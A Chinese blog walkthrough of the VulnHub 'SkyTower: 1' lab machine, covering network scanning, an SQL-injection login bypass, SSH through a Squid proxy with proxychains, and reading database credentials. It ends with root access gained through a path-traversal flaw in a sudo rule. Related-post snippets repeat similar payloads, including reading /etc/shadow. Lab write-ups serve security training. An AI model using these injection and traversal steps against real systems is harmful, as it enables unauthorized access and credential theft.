Skytower

最新推荐文章于 2024-09-20 14:16:44 发布
最新推荐文章于 2024-09-20 14:16:44 发布
阅读量596 收藏 7
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/142305519
版权

一、安装配置靶机

下载地址:

SkyTower: 1 ~ VulnHub

下载之后解压发现是VirtualBox格式的

我们下载一个VirtualBox,这是官网

Downloads – Oracle VirtualBox

安装到默认路径就

打开后点击注册

选择解压后的vbox文件

然后点击左上角管理

点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步

就得到了一个镜像文件

用vmware打开

默认网卡模式为仅主机,更改为NAT模式

C段扫描获得IP

arp-scan -l

端口扫描一下发现22,80,3128

nmap 192.168.230.128

访问一下80端口

发现一个登录框

发现登录框,我们测sql注入

邮箱随便输入一个,密码我们输入

123' 1=1#

登录成功发现账号密码

想到远程连接22端口

发现无效

想到3128端口尝试挂上代理连接

vim /etc/proxychains4.conf

proxychains ssh john@192.168.230.128 -t "/bin/sh"

登录成功

开始提权

sudo -l

发现没有可以提权的

想到了80端口界面存在sql注入

cat /var/www/login.php

发现数据库信息

登录成功

mysql -u root SkyTech -p

查看数据库信息

show databases;

逐个查看找到

use SkyTech;
show tables;

得到账号密码

select * from login

ssh登录

proxychains ssh sara@192.168.230.128 -t "/bin/sh"

sudo -l

得到/accounts/*有权限

pwd

发现在根目录下

sudo ls /accounts/../root

查看一下

sudo cat /accounts/../root/flag.txt

得到root密码

远程连接提权成功

proxychains ssh root@192.168.230.128 -t "/bin/sh"

mouyu⇔
关注
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 296
vuluhub-skytower-1渗透靶场SkyTower 1提权
SkyTower
幻影狐的博客
09-14 298
利用用户进行远程连接,但是发现连接失败了,前面有一个 3128 端口,是 squid-http 代理。查看到 root 目录下有一个 flag.txt 文件,查看后发现了 root 用户的密码。看到了 /accounts/* 可以利用这个目录去查看 /root 目录。在 SkyTech 库 login 表中找到了一下用户的邮箱和密码。找到了 mysql 数据库的用户名和密码,登录一下 mysql。email=1'||1#,发现好像是成功了,尝试登录。发现了 john 用户和用户的密码。
SkyTower靶机
m0_61995767的博客
07-30 1804
KeyTower打靶记录
skytower靶机
weixin_74232792的博客
07-31 321
用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/,发现有个flag文件,查看一下,有root用户的密码,直接切换root,成功提权。发现在accounts目录下有root权限,用以下命令查看shadow文件,cat /accounts/../etc/shadow。转换其他思路,想到刚才扫到了一个代理端口,并且开放了ssh,尝试用这个账号密码连接一下。切换从数据库中发现的其他用户,Sara用户是可以ssh连接的,另外一个不行。
SkyTower 靶机 - 详细流程
m0_73983897的博客
09-20 1108
流程:主机发现 - 端口扫描 - web渗透 - 获取shell - 权限提升 web渗透:在发现SQL注入后,首先尝试的便是Sqlmap利用,但无果,原因是数据库拒绝了外部连接;设置代理访问这块,提示的很明显,毕竟在网页上直接写着....proxychains ssh john@192.168.142.145 -t "命令"通过ssh的-t参数执行命令,算比较少见的,这里也可以执行系统命令,反弹shell等权限提升:期间也有直接利用cat包含。
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 611
vulnhub靶场--SkyTower靶场
SkyTower靶机复现
weixin_52956666的博客
07-31 530
发现ssh登陆失败,扫描端口的时候22端口状态不是open,但是3128端口开放, 是http-proxy是代理端口。因为有后台,所以数据库大概率有账号密码,cat /var/www/login.php。将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址。加入 ' || 1=1#进行闭合,发现闭合成功,并且爆出了账号密码。同理,vim /etc/proxychains4.conf 也一样。尝试构造sql注入,发现有报错回显,说明存在sql注入。点击注册,将靶机资源加入进入,点击启动。
SKYTOWER: 1超详细靶机实战
weixin_68615160的博客
07-31 515
下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox,这是官网安装到默认路径就行打开后点击注册选择解压后的vbox文件然后点击左上角管理点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步就得到了一个iso镜像文件用vmware打开默认网卡模式为仅主机,更改为nat模式。
SkyTower靶机渗透测试
weixin_58786230的博客
07-31 326
【代码】SkyTower靶机渗透测试。
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 497
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3246
每台都做一做,然后记录在博客里.供自己和大家一起学习.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8544
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CPPC++_作为反向代理来保护您的web服务免受攻击和利用.zip
11-12
cppc++
CPPC++_原生macOS HD音频,不支持官方编解码器.zip
11-12
cppc++
Matlab实现黏菌优化算法SMA-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
11-12
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
【SCI2区】基于花朵授粉优化算法FPA优化TCN锂电池健康寿命预测算法研究Matlab实现.rar
11-12
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
临时项目:使用python进行自动网页抢票,包含selenium的调用,cookie获取以及网页信息全识别.zip
最新发布
11-12
临时项目:使用python进行自动网页抢票,包含selenium的调用,cookie获取以及网页信息全识别
MATLAB实现GWO-ELM灰狼算法优化极限学习机多输入单输出回归预测(多指标,多图)(含完整的程序和代码详解)
11-12
内容概要:本文档详细介绍了如何在MATLAB中利用灰狼优化算法(GWO)优化极限学习机(ELM)实现多输入单输出回归预测。内容涵盖了项目背景、目标与意义、挑战、特点与创新、应用领域、模型架构、代码实现、算法流程、数据预处理、模型训练与优化、预测与结果分析、性能评估与可视化、GUI设计等各个方面。文档不仅提供了完整的程序和详细的代码解释,还展示了实际的预测结果与真实数据的对比图。 适合人群:具备一定编程基础的数据科学家、研究人员、工程师及高校学生。 使用场景及目标:该模型主要应用于时间序列预测、金融市场建模、工业控制系统、生物信息学等领域的多输入单输出回归预测任务。目标是通过GWO优化ELM的输入权重和偏置参数,提高预测精度和模型泛化能力。 其他说明:项目还包括了模型的扩展方向和未来改进计划,以便进一步提升模型的性能和实用性。
【SCI2区】基于蚁狮优化算法ALO优化TCN锂电池健康寿命预测算法研究Matlab实现.rar
11-12
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值